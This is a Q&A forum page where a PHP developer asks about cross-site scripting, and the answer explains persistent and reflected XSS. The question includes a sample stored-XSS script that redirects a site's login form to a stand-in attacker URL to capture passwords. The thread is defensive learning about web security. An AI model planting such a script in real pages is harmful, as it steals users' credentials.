Home/ Questions/Q 7085427
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-28T07:25:23+00:00

I’m a PHP developer and I’m looking to improve the security of my sites.

  • 0

I’m a PHP developer and I’m looking to improve the security of my sites.

From what I understand the following are two major types of vulnerabilities which affect web applications:

  • SQL Injection
  • XSS

SQL Injection can be fixed with prepared statements – easy.

But I still don’t really get XSS – is the following an example of XSS?…

  • Page full of user-made content has a login form at the top (site-wide).
  • The user’s input to the page is not HTML-escaped.
  • A user posts the following content (e.g. a comment) to the page…
A really nice comment

<!-- now an evil script (example here with jquery, but easily done without) --->
<script type="text/javascript">
$(document).ready(function() {
    $('#login_form').attr('action','http://somehackysite.com/givemeyourpw.php');
});
</script>
  • An innocent user comes to the page, the script executes.
  • The innocent user realises they’re not logged in, and enter their details into the form.
  • The user’s details are sent off to http://somehackysite.com/givemyourpw.php and then the user’s account details are stolen.

So I really have three questions here:

  1. Would this work?
  2. Is this XSS?
  3. Are there any precautions developers should take against XSS other than escaping HTML?
Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    There are two types are XSS attacks: Reflected XSS and Persistent XSS attacks. What you’ve described, where a user of the site inputs data that gets saved on the server side, and is rendered for anyone viewing a page, is considered Persistent XSS. Similar attacks would be if you have a comment box on a post that doesn’t escape Javascript, or a profile page I can put anything into.

    The other class of XSS attacks is Reflected XSS. These are a little more complicated, but they amount to one of the arguments in the URL for a page not being escaped. They frequently come up in things like Search pages on large websites. You’ll get a URL that includes some javascript in it (sorry, my example got mangled by the renderer here, so I can’t show you an example) , and the page will render the javascript which would allow someone to craft a malicious URL. These are especially dangerous on sites that hand any sort of financial data; imagine a conscientious user who always checks to make sure the they’re going to the write link to their bank, but because of a Reflected XSS attack an attacker is able to send them to a legitimate page on their bank’s website, but that has malicious code in it.

    In any case, your example is Persistent XSS. You can do even more nefarious things with attacks like that than just changing where a login form sends users. They’ve been popular for years to do things like scraping information from personal areas of sites, or coupled with CSRF to cause an authenticated user to do something by simply looking at a page. There were a few MySpace viruses a while back that did that, and spread from profile to profile.

    • 0